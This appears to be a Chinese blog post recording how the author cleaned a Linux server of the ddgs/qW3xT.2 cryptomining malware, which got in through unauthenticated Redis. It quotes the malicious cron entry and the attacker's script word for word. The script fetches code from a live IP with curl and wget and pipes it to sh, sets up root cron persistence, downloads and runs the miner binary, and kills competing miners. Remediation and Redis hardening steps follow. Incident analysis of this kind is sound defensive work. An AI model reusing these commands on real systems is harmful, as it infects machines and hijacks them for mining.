linux 服务器被植入ddgs、qW3xT.2挖矿病毒处理记录
被入侵后的现象:
发现有qW3xT.2与ddgs两个异常进程,消耗了较高的cpu,kill掉后 过一会就会重新出现。
kill 掉这两个异常进程后,过一段时间看到了如下进程:
首先在/etc/sysconfig/crotnab中的定时任务没有找到定时脚本,输入crontab -e 在其中找到了该定时任务
1
|
*/5 * * * * curl -fsSL http: //149.56.106.215:8000/i.sh | sh
|
1
|
|
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "" > /var/spool/cron/root echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/crontabs/root echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013 if [ ! -f "/tmp/ddgs.3013" ]; thenwget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013 fi chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill #ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill #ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
处理方法:
1.删除 crontab -e 中
*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
2.清除/root/.ssh/authorized_keys 中黑客设置的免密登录内容
3.修改redis密码
4.修改root与登录账户密码
安全建议:
1.配置bind选项,限定可以连接Redis服务器的IP,修改 Redis 的默认端口6379 配置认证,也就是AUTH,设置密码,密码会以明文方式保存在Redis配置文件中
2.配置rename-command 配置项 “RENAME_CONFIG”,这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度
3.如果可以在防火墙中屏蔽redis外网
入侵方式:
收集了相关资料,了解到其是利用redis漏洞,未设置密码或密码太简单,导致的被入侵。具体方式可以参考
http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/
reids修改密码方法如下:
redis-cli -h 127.0.0.1 -p 6379 config get requirepass ##获取当前密码 config set requirepass "yourpassword" ##设置当前密码,服务重新启动后又会置为默认,即无密码;
永久生效方法为,打开redis配置文件redis.conf,找到requirepass值修改密码,如下:
requirepass yourpassword ##此处注意,行前不能有空格
linux 服务器被植入ddgs、qW3xT.2挖矿病毒处理记录相关推荐
- linux服务器被植入挖矿病毒后初步解决方案
linux服务器被植入挖矿病毒是真让人无语,密码也被暴力破解,还时不时挖矿重启. 只能上网搜索,初步解决方案如下: 一.定位攻击服务器的ip 首先root,然后进~/.cache,使用netstat ...
- Linux被kdevtmpfsi,pnscan挖矿病毒入侵记录
Linux被kdevtmpfsi,pnscan挖矿病毒入侵 记录起因 从腾讯云刚拿了一台新服务器,第一天装好docker环境后,第二天上午就收到了来自腾讯云的短信警告.登陆平台后发现站内信 好在腾讯没 ...
- 一键查杀linux挖矿脚本,这几个linux命令或许帮您查杀挖矿病毒
最近受类似于比特币及区块链技术的影响,有些云服务器被攻入,植入挖矿病毒,利用你的云服务器来挖矿.本文就阐述几个常用的linux命令,假如你碰到这样的病毒,这些linux命令可能会有些帮助.这些命令并不 ...
- 服务器集体中毒事件 xmrig trace 挖矿病毒
事件简述: 2019年12月22日,我们服务的一个客户服务器大面积提示被用于"挖矿",随即我们便进行了病毒的清理,但病毒的来源通过我们原有实施的监控和安全检测中并未能发现.事前我们 ...
- 阿里云 qW3xT.4 挖矿病毒问题
查了一下.是个挖矿病毒,cpu 占用巨高 .杀了又有守护进程启动.网上有些杀死这个病毒的办法,大家可以试试.但是不确定能杀死. 建议直接重装系统. 然后,说说这货怎么传播的. 他公国redis .目前 ...
- syst3md 挖矿病毒处理记录
这两天发现服务器上部署的应用系统 体验较差,访问响应慢 不太对劲.部分接口响应达到了 4秒.正好空闲上服务器上检查一下性能. [root@localhost ~]# mpstat -P ALL 10 ...
- 清除挖矿病毒solr记录
问题场景: 周一早上查看grafana,少了三个节点的信息,启动后,发现三个节点的cpu告警,随后节点又挂了. 正常情况下,一般node节点不会挂掉,查看节点hadoop相关进程,一切正常. 问题描述 ...
- Centos qW3xT.2 挖矿病毒
亲测,管用! https://blog.csdn.net/yitian_66/article/details/81304681
- 【应急类漏洞】WatchDogsMiner挖矿蠕虫大量感染Linux服务器
近日,深信服安全团队追踪到公有云上及外部Linux服务器存在大量被入侵,表现为/tmp临时目录存在watchdogs文件,出现了crontab任务异常.网络异常.系统文件被删除.CPU异常卡顿等情况, ...
最新文章
- 基于消失点的相机自标定(2)
- PM们,请避免对产品的过度解读!
- ASP.NET MVC5+EF6+EasyUI 后台管理系统(73)-微信公众平台开发-消息管理
- 对事务的特性ACID的理解
- 机器学习算法之集成学习
- 信息学奥赛一本通(1173:阶乘和)
- 使用ssh远程连接时的一些注意问题
- 05-netty小例子
- 02-neo4j的基本命令
- 以太坊智能合约部署与交互
- TinyMCE 富文本编辑器 ━━ 自定义插件之弹窗基础设置(整理)
- android app 后台运行,安卓APP锁定后台运行的方法
- 东芝打印机共享怎么设置_如何设置东芝复印机为网络共享打印机?
- carry on till tomorrow
- 电容或电感的电压_磁场对于电感路径检测的影响
- 三款骨传导耳机性价比推荐-2023年最受欢迎的骨传导牌子
- python的类中 _、__和__xx__的区别
- MySQL Workbench报错说 seems to be a different OS
- trunc和round区别
- wp10手机不能连接微软服务器,Lumia920手机更新10166版WP10后,无法用Microsoft账户登录,也无法添加Microsoft账 - Microsoft Community...